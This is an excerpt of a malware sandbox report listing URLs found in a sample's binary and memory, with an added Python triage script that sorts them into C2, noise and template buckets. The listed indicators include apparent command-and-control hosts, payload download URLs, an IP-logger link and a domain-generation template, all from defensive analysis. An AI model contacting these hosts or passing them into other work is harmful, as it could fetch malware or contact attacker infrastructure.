Source: 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 00000015.00000003.574894827.0000000002559000.00000004.00000001.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/r
Source: 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/wlub
Source: 1E1C360C582DF797.exe, 00000015.00000003.563127695.0000000005DD4000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCode
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmp String found in binary or memory: http://crl.usertrust.
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: 1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmp String found in binary or memory: http://crt.com
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp String found in binary or memory: http://docs.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmp String found in binary or memory: http://dream.pics/setup_10.2_mix1.exe
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://dream.pics/setup_10.2_mix1.exe6b_x
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://dream.pics/setup_10.2_mix1.exeimet
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp String found in binary or memory: http://drive.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://ef6df4af06ba6896.xyz/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://ef6df4af06ba6896.xyz/info/du
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://ef6df4af06ba6896.xyz/info/du.
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://ef6df4af06ba6896.xyz/info/du:
Source: aliens.exe, aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: h1GodtbhC8.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0P
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0R
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.usertrus
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmp String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 1607186572092.exe, 0000001C.00000002.546643482.0000000000198000.00000004.00000010.sdmp, 1607186588295.exe, 0000001D.00000002.580802111.0000000000198000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
Source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: 1E1C360C582DF797.exe, 00000015.00000002.824956152.0000000000196000.00000004.00000001.sdmp String found in binary or memory: http://www.sodown.xyz/in
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmp String found in binary or memory: http://www.sodown.xyz/index.exe
Source: 1E1C360C582DF797.exe String found in binary or memory: http://www.youtube.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com_7
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: https://.twitter.com/s
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: https://1C5491A87D65F1EF.club/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/up
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/upData
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/upycfa
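The network indicators above are spread over dozens of "String found in binary or memory" lines, mixed with certificate-chain URLs (DigiCert, Sectigo) and vendor hosts that any signed binary carries, and the same C2 host appears both upper- and lower-cased (EF6DF4AF06BA6896.xyz / ef6df4af06ba6896.xyz). The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report and not the sample's code. It parses lines in the report's own format (the DNS query, the POST /info/w beacon, and the string hits), folds hostnames to lower case, drops strings that cannot be hostnames (truncated ASN.1 remnants such as "ocsp.digicert.com0:", format-string templates such as the "01%s08%s15%s22%sWebGL%d%02d%s.club" pattern, which it reports separately), and separates a noise allowlist from everything else. The allowlist contents and the rule that flags a 16-hex-character label under .xyz or .club are the editor's assumptions derived from the two hosts seen in this report, not sandbox signatures; the embedded sample lines are copied from the report above.

```python
"""Triage helper for sandbox "String found in binary or memory" / traffic lines.

Added example (editor's code, not from the sandbox report). The noise
allowlist and the 16-hex-label rule are assumptions based on this report.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: lines copied in the shape the report above uses.
REPORT_LINES = """\
Source: unknown DNS traffic detected: queries for: ef6df4af06ba6896.xyz
Source: unknown HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/ddd
Source: 1E1C360C582DF797.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/up
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://dream.pics/setup_10.2_mix1.exe6b_x
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://www.sodown.xyz/index.exe
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp String found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com
"""

URL_RE = re.compile(r"String found in binary or memory: (\S+)")
DNS_RE = re.compile(r"DNS traffic detected: queries for: (\S+)")
# The report glues all request headers onto one line, so match lazily up to Host:.
HTTP_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01].*?Host: ([A-Za-z0-9.-]+)")
# Hostname hygiene: LDH labels and an all-letter TLD. This rejects ASN.1 remnants
# ("ocsp.digicert.com0"), empty labels (".twitter.com") and trailing dots.
HOST_RE = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*\.[a-z]{2,63}$")
# Assumption: the sample's own hosts in this report are 16 hex chars under .xyz/.club.
HEX16_RE = re.compile(r"^[0-9a-f]{16}\.(xyz|club)$")

# Assumption: certificate AIA/CRL/OCSP hosts and well-known vendor hosts are
# embedded by code signing or by the browser data the stealer parses; treat as noise.
NOISE_SUFFIXES = (
    "digicert.com", "sectigo.com", "comodoca.com", "usertrust.com", "cloudflare.com",
    "google.com", "googleapis.com", "gstatic.com", "googleusercontent.com",
    "facebook.com", "instagram.com", "twitter.com", "apple.com",
    "nsis.sf.net", "curl.haxx.se", "nirsoft.net",
)


def is_noise(host):
    return any(host == s or host.endswith("." + s) for s in NOISE_SUFFIXES)


def hostname_of(token):
    """Lower-cased hostname of a URL-like string, or None if it is not a valid host."""
    try:
        host = urlsplit(token).hostname  # already lower-cased by urlsplit
    except ValueError:
        return None
    if not host or not HOST_RE.match(host):
        return None
    return host


def triage(report_text):
    """Split hostnames into beacons, DNS, flagged, other and noise buckets.

    Strings glued to a following header name (e.g. "twitter.comReferer:") pass
    HOST_RE and land in "other"; they still need a human look.
    """
    beacons, dns, templates, hosts = [], [], [], set()
    for line in report_text.splitlines():
        m = HTTP_RE.search(line)
        if m:
            method, path, host = m.groups()
            beacons.append((method, path, host.lower()))
            hosts.add(host.lower())
            continue
        m = DNS_RE.search(line)
        if m:
            dns.append(m.group(1).lower())
            hosts.add(m.group(1).lower())
            continue
        m = URL_RE.search(line)
        if not m:
            continue
        token = m.group(1)
        if "%s" in token or "%d" in token:
            templates.append(token)  # printf-style domain template, report as-is
        host = hostname_of(token)
        if host:
            hosts.add(host)
    flagged = {h for h in hosts if HEX16_RE.match(h)}
    noise = {h for h in hosts - flagged if is_noise(h)}
    return {
        "beacons": beacons,
        "dns": dns,
        "flagged": sorted(flagged),
        "other": sorted(hosts - flagged - noise),
        "noise": sorted(noise),
        "templates": templates,
    }


if __name__ == "__main__":
    for bucket, items in triage(REPORT_LINES).items():
        print(bucket, items)
```

Feed it the full report text to get one de-duplicated host list per bucket; the "beacons" entry keeps the observed method and path (POST /info/w here) so it can be turned into a proxy or IDS rule, and "templates" surfaces the printf-style domain pattern that would otherwise be lost when only resolved hostnames are collected.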
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.650204925.0000000004190000.00000004.00000040.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 1E1C360C582DF797.exe, 00000019.00000003.640661487.0000000005CB4000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.650204925.0000000004190000.00000004.00000040.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxU
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://content.googleapis.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831435598.0000000004FD1000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.640301592.0000000005C59000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.640301592.0000000005C59000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?usp=chrome_appnuA2
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/B7
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/drive/settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/drive/settings51iB7
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://feedback.googleusercontent.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://hangouts.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp String found in binary or memory: https://iplogger.org/14Zhe7
Source: 1E1C360C582DF797.exe String found in binary or memory: https://mail.google.com/mail
Source: 1E1C360C582DF797.exe String found in binary or memory: https://mail.google.com/mail/#settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://mail.google.com/mail/#settingsox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp String found in binary or memory: https://mail.google.com/mailx
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp String found in binary or memory: https://payments.google.com/
Source: 1E1C360C582DF797.exe String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/
Source: 1E1C360C582DF797.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 1E1C360C582DF797.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: h1GodtbhC8.exe String found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 00000015.00000003.563235849.0000000005D32000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpZk
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/
